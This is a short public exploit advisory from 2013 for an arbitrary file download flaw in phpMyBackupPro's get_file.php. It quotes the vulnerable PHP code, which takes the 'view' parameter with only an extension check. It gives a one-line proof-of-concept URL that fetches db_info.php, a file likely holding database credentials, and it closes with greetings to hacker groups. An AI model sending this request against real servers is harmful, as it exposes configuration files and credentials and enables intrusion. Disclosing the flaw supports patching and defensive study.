facebook facebook twitter rss

phpMyBackupPro (all versions) Arbitrary File Download Vulnerability

Author: TUNISIAN CYBER , Published: 17-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: phpMyBackupPro (all versions) Arbitrary File Download Vulnerability
[+] Date: 17-12-2013
[+] Category: WebApp
[+] Vendor: http://www.phpmybackuppro.net/download.php
[+] Google Dork: n/a
[+] Tested on: Win7
[+] Friend's blog: http://na3il.wordpress.com/

########################################################################################
+Description:

phpMyBackupPro is a web-based MySQL backup application in PHP. You can schedule backups
,download, email or upload them with FTP and backup whole file directories.
Zip and gzip compression, easy interface and installation

Exploit:
phpMyBackupPro suffers from from Arbitrary File Download Vulnerability:

File: get_file.php
Parameter:view

[PHP]
if (isset ($_GET['view']) && file_exists($_GET['view'])) {

$ext4 = substr($_GET['view'],-4);
$ext5 = substr($_GET['view'],-5);
$ext7 = substr($_GET['view'],-7);
$ext8 = substr($_GET['view'],-8);
if ($ext4 != ".php" && $ext5 != ".html" && $ext4 != ".htm" && $ext5 != ".php3" && $ext4 != ".sql" && $ext8 != ".sql.zip" && $ext7 != ".sql.gz") {
echo GF_INVALID_EXT . "!";
} else {
[PHP]

P.O.C:

127.0.0.1/[PATH]/phpMyBackupPro/get_file.php?download=true&view=db_info.php
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :